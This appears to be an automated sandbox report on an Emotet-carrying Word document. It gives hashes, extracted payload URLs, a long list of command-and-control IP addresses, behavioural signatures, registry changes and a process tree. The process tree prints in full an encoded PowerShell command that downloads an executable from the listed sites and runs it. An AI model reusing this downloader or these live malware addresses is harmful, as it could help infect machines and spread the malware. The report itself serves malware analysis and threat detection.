Analysis
-
max time kernel
57s -
max time network
45s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
18-07-2020 01:58
Static task
static1
General
-
Target
fc56717cca4ae6fb3cd905dfed6ddfccb6be04778d169f06fd8dd832e05b5789.doc
-
Size
194KB
-
MD5
6819848b03bc90dd47d7667cf55ca36b
-
SHA1
aa0b0b7e4bf2217a77e60dc635e79343fe9b6ef7
-
SHA256
fc56717cca4ae6fb3cd905dfed6ddfccb6be04778d169f06fd8dd832e05b5789
-
SHA512
f60c692555a59f96ec07ac1e8695418774717c70a506ce9e0a171f8768038513ca72b46c4b2a319522ea83f2f6c9851b193f87ee6fa0f0e5173efbb4bfd7039d
Malware Config
Extracted
https://aliyousefpoor.com/wp-admin/Gkt8B41139/
http://www.szhealthshield.com/websiteguide/k82i/
https://digitalcon7.net/wp-snapshots/0Wn/
https://exam.ylsbmeirong.com/data/tjEyH973/
http://abatiy.com/yaa/po0395/
Extracted
emotet
177.144.135.2:80
104.247.221.104:443
201.213.32.59:80
190.147.137.153:443
178.79.163.131:8080
190.17.195.202:80
212.71.237.140:8080
68.183.190.199:8080
12.162.84.2:8080
186.250.52.226:8080
181.129.96.162:8080
185.94.252.12:80
77.55.211.77:8080
177.72.13.80:80
70.32.115.157:8080
114.109.179.60:80
68.183.170.114:8080
5.196.35.138:7080
87.106.46.107:8080
190.163.1.31:8080
177.66.190.130:80
137.74.106.111:7080
203.25.159.3:8080
190.181.235.46:80
207.255.37.143:80
111.67.12.221:8080
187.51.47.26:80
46.28.111.142:7080
80.249.176.206:80
181.31.211.181:80
190.194.242.254:443
217.199.160.224:7080
219.92.13.25:80
70.32.84.74:8080
104.131.103.37:8080
104.131.41.185:8080
83.169.21.32:7080
170.81.48.2:80
186.70.127.199:8090
91.236.4.234:443
204.225.249.100:7080
185.94.252.27:443
82.196.15.205:8080
89.32.150.160:8080
50.28.51.143:8080
185.94.252.13:443
2.47.112.152:80
149.62.173.247:8080
46.214.11.172:80
177.139.131.143:443
61.92.159.208:8080
217.13.106.14:8080
181.120.79.227:80
192.241.143.52:8080
189.218.165.63:80
113.190.254.245:80
192.241.146.84:8080
77.90.136.129:8080
202.62.39.111:80
72.47.248.48:7080
172.104.169.32:8080
187.162.248.237:80
143.0.87.101:80
190.229.148.144:80
51.255.165.160:8080
104.236.161.64:8080
190.6.193.152:8080
45.161.242.102:80
94.176.234.118:443
Signatures
-
Blacklisted process makes network request 3 IoCs
Processes:
powersheLL.exeflow pid process 4 1804 powersheLL.exe 6 1804 powersheLL.exe 8 1804 powersheLL.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
933.exedescription pid process target process PID 792 wrote to memory of 1612 792 933.exe fdBthProxy.exe PID 792 wrote to memory of 1612 792 933.exe fdBthProxy.exe PID 792 wrote to memory of 1612 792 933.exe fdBthProxy.exe PID 792 wrote to memory of 1612 792 933.exe fdBthProxy.exe -
Modifies registry class 280 IoCs
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8EAB2246-FF09-4562-85A1-83E97D77A8E9}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8EAB2246-FF09-4562-85A1-83E97D77A8E9}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\TypeLib\{8EAB2246-FF09-4562-85A1-83E97D77A8E9}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8EAB2246-FF09-4562-85A1-83E97D77A8E9}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8EAB2246-FF09-4562-85A1-83E97D77A8E9}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\TypeLib WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE -
Drops file in System32 directory 2 IoCs
Processes:
powersheLL.exe933.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powersheLL.exe File opened for modification C:\Windows\SysWOW64\eudcedit\fdBthProxy.exe 933.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1400 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powersheLL.exefdBthProxy.exepid process 1804 powersheLL.exe 1804 powersheLL.exe 1612 fdBthProxy.exe 1612 fdBthProxy.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 1804 powersheLL.exe -
Executes dropped EXE 2 IoCs
Processes:
933.exefdBthProxy.exepid process 792 933.exe 1612 fdBthProxy.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
WINWORD.EXE933.exefdBthProxy.exepid process 1400 WINWORD.EXE 1400 WINWORD.EXE 792 933.exe 792 933.exe 1612 fdBthProxy.exe 1612 fdBthProxy.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1804 1668 powersheLL.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fc56717cca4ae6fb3cd905dfed6ddfccb6be04778d169f06fd8dd832e05b5789.doc"1⤵
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABoAGEAdQBoAHEAdQBhAGMAdgBvAGUAbQBuAGkAbwB2AGsAbwB1AHoAPQAnAGQAYQB3AHEAdQBpAG8AYgBkAGEAdQBjAGgAdgBpAGUAYgBxAHUAZQBhAGQAJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAVQBSAEkAdABZAGAAUABSAGAATwBgAFQATwBDAG8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAHcAaQBlAHAAeABlAGkAYwB3AGUAYQBnAGMAbwBvAGcAYgBpAGEAbABqAG8AcQB1ACAAPQAgACcAOQAzADMAJwA7ACQAdABlAGEAZwBzAGUAaQB2AG4AaQBvAHgAagBhAG8AcQB1AD0AJwBsAGUAbwBrAGcAbwB1AGoAagBlAGUAYgBiAGEAZQBoACcAOwAkAHAAdQB1AHIAdABoAGUAcwB5AGUAYQB5AHMAaQBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAZQBwAHgAZQBpAGMAdwBlAGEAZwBjAG8AbwBnAGIAaQBhAGwAagBvAHEAdQArACcALgBlAHgAZQAnADsAJABjAGEAdQBtAHQAbwBlAHEAdQBrAGEAYwBjAGgAaQBvAGgAZwBlAGUAcwBiAHUAbAA9ACcAZgBvAGkAcgBmAGEAbwB6AGMAbwB6AGgAaQBhAGwAcQB1AGEAdQBzACcAOwAkAHQAaABhAGkAdABrAGEAZQByAHoAdQB1AGYAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQBUAC4AdwBlAEIAQwBMAEkARQBOAFQAOwAkAHMAZQBhAG0AcQB1AG8AdQB3AGMAaABlAHUAYwBoAHgAYQB1AGcAegBlAGkAagA9ACcAaAB0AHQAcABzADoALwAvAGEAbABpAHkAbwB1AHMAZQBmAHAAbwBvAHIALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEcAawB0ADgAQgA0ADEAMQAzADkALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAHoAaABlAGEAbAB0AGgAcwBoAGkAZQBsAGQALgBjAG8AbQAvAHcAZQBiAHMAaQB0AGUAZwB1AGkAZABlAC8AawA4ADIAaQAvACoAaAB0AHQAcABzADoALwAvAGQAaQBnAGkAdABhAGwAYwBvAG4ANwAuAG4AZQB0AC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwAwAFcAbgAvACoAaAB0AHQAcABzADoALwAvAGUAeABhAG0ALgB5AGwAcwBiAG0AZQBpAHIAbwBuAGcALgBjAG8AbQAvAGQAYQB0AGEALwB0AGoARQB5AEgAOQA3ADMALwAqAGgAdAB0AHAAOgAvAC8AYQBiAGEAdABpAHkALgBjAG8AbQAvAHkAYQBhAC8AcABvADAAMwA5ADUALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAGQAYQBvAGYAcgBhAG8AdABwAGEAbwB0AHYAdQBhAHcAPQAnAHcAZQBhAHoAdABlAHUAZABjAGUAaQBnAGMAbwBlAHcAdABoAGUAaQB4AG0AZQB1AHcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAbwBpAG0AeABlAG8AbgBtAG8AYQB3ACAAaQBuACAAJABzAGUAYQBtAHEAdQBvAHUAdwBjAGgAZQB1AGMAaAB4AGEAdQBnAHoAZQBpAGoAKQB7AHQAcgB5AHsAJAB0AGgAYQBpAHQAawBhAGUAcgB6AHUAdQBmAC4AIgBEAGAATwB3AG4ATABgAG8AYQBkAGYASQBMAEUAIgAoACQAbABvAGkAbQB4AGUAbwBuAG0AbwBhAHcALAAgACQAcAB1AHUAcgB0AGgAZQBzAHkAZQBhAHkAcwBpAG4AKQA7ACQAcwBvAGkAbgB3AGEAegBtAGUAaQBrAGgAZQBvAHYAdABoAGEAdQBqAGYAbwBpAHgAPQAnAG0AYQBlAHIAZABvAHUAZwBsAG8AaQBtAGcAbwBhAHQAaABjAHUAdQBjACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAcAB1AHUAcgB0AGgAZQBzAHkAZQBhAHkAcwBpAG4AKQAuACIATABgAEUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMANwA2ADMAOQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBgAFIAZQBhAHQARQAiACgAJABwAHUAdQByAHQAaABlAHMAeQBlAGEAeQBzAGkAbgApADsAJABiAGEAZQB3AD0AJwB5AG8AdAB3AGEAaQB2AG0AbwBvAGsAcwBhAG8AYwBoAHQAbwBpAGoAJwA7AGIAcgBlAGEAawA7ACQAYwBpAG8AcwBwAGkAbwBiAHEAdQBhAG8AcwBsAGUAaQB3AD0AJwBqAGEAZQBjAGgAZgB1AHUAYwBoAGoAaQBlAHkAegBhAGUAeQBwAGUAbwB6AHQAaABvAGkAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AGUAZQBjAGwAaQBlAGcAPQAnAHgAdQBqACcA1⤵
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
PID:1804
-
C:\Users\Admin\933.exeC:\Users\Admin\933.exe1⤵
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:792 -
C:\Windows\SysWOW64\eudcedit\fdBthProxy.exe"C:\Windows\SysWOW64\eudcedit\fdBthProxy.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1612